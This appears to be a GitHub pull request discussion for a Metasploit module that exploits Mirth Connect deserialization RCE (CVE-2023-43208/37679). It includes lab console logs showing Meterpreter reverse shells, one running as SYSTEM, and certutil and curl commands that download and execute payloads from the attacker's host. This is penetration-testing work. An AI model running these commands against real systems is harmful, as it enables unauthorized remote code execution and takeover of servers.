Add an exploit for Mirth Connect RCE (CVE-2023-43208 and CVE-2023-37679) #18755
Conversation
Tested on Linux (versions 4.1.1, 4.3.0, and 4.4.0) and Windows (version 4.4.0).
Great module @zeroSteiner. Thanks for the nice and easy target setup instructions. One minor question about the exploit methods.
Unix Command
msf6 > use mirth_connect_cve_2023_43208
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/mirth_connect_cve_2023_43208 2023-10-25 excellent Yes Mirth Connect Deserialization RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/mirth_connect_cve_2023_43208
[*] Using exploit/multi/http/mirth_connect_cve_2023_43208
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (3045380 bytes) to 192.168.1.78
[*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.78:51774) at 2024-01-29 11:41:45 -0500
meterpreter > getuid
Server username: mirth
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 22.04 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Windows Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rhost 172.16.199.138
rhost => 172.16.199.138
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rport 8449
rport => 8449
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set target 1
target => 1
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/windows/http/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (201798 bytes) to 192.168.1.78
[*] Meterpreter session 2 opened (192.168.1.78:4444 -> 192.168.1.78:54437) at 2024-01-29 13:16:01 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MSFDEVICE
OS : Windows 11 (10.0 Build 22621).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
{ | ||
'Platform' => 'win', | ||
'Arch' => ARCH_CMD, | ||
'Payload' => { 'Space' => 8191, 'DisableNops' => true } |
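Review bot: the `'Space' => 8191` value in the Windows target's payload options should carry an inline comment naming the constraint it encodes, the cmd.exe command-line length limit of 8191 characters quoted in the review below, so readers and authors of other command-payload modules can find the reason without digging through this thread.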
I was wondering where the 8191 was coming from and after reading the definition below it made me realize I've likely written a number of modules that were subject to this limitation but did not include it. Good to know.
Command prompt (Cmd.exe) command-line string limitation
In Command Prompt, the total length of the following command line can't contain more than 8191 characters
Just one nitpick about updating the docs after the most recent change.
Retested, everything is working as expected - I think this is ready to land 👍
Windows Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set verbose true
verbose => true
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Command to run on remote host: certutil -urlcache -f http://192.168.1.78:8080/SSCwCwV_75HP-noz9RKoGA %TEMP%\klTioAXB.exe & start /B %TEMP%\klTioAXB.exe
[*] Fetch Handler listening on 192.168.1.78:8080
[*] HTTP server started
[*] Adding resource /SSCwCwV_75HP-noz9RKoGA
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected target version: 4.4.0
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/windows/http/x64/meterpreter/reverse_tcp (Windows Command)
[+] The target appears to have executed the payload.
[*] Client 192.168.1.78 requested /SSCwCwV_75HP-noz9RKoGA
[*] Sending payload to 192.168.1.78 (Microsoft-CryptoAPI/10.0)
[*] Client 192.168.1.78 requested /SSCwCwV_75HP-noz9RKoGA
[*] Sending payload to 192.168.1.78 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 192.168.1.78
[*] Meterpreter session 5 opened (192.168.1.78:4444 -> 192.168.1.78:55931) at 2024-01-29 14:05:16 -0500
meterpreter > exit
[*] Shutting down session: 5
Unix Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Command to run on remote host: curl -so ./oYSMVSXND http://192.168.1.78:8080/z3OF01M3YP0rzw1UQ9fhzA; chmod +x ./oYSMVSXND; ./oYSMVSXND &
[*] Fetch Handler listening on 192.168.1.78:8080
[*] HTTP server started
[*] Adding resource /z3OF01M3YP0rzw1UQ9fhzA
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected target version: 4.4.0
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)
[+] The target appears to have executed the payload.
[*] Client 192.168.1.78 requested /z3OF01M3YP0rzw1UQ9fhzA
[*] Sending payload to 192.168.1.78 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.78
[*] Meterpreter session 6 opened (192.168.1.78:4444 -> 192.168.1.78:55963) at 2024-01-29 14:07:49 -0500
meterpreter > getuid
Server username: mirth
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 22.04 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Detected target version: 4.1.1 | ||
[+] The target appears to be vulnerable. Version 4.1.1 is affected by CVE-2023-37679. | ||
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) |
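Review bot: the documented Linux run stops at the "Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)" line, but the module as retested above now prints "[+] The target appears to have executed the payload." right after it; add that line so the documentation matches the current output.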
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) | |
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) | |
[+] The target appears to have executed the payload. |
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Detected target version: 4.4.0 | ||
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208. | ||
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) |
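Review bot: same gap in the Windows documentation run: after "Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)" the module now emits "[+] The target appears to have executed the payload." (see the verbose Windows Command run above), so the documented output should include it.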
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) | |
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) | |
[+] The target appears to have executed the payload. |
Release Notes
This PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679, where the former is a patch bypass for the latter. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget.
I have tried the exploit on a target Linux system but am getting no session created: I have checked firewall rules and everything, any idea what I may be doing wrong and why there is no session being created?
Try using a different
@zeroSteiner It worked thanks!
Mirth Connect versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679, where the former is a patch bypass for the latter. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget.
Verification
List the steps needed to make sure this thing works
- use exploit/multi/http/mirth_connect_cve_2023_43208
- Set RHOSTS, PAYLOAD and payload-related options
Demo (Windows)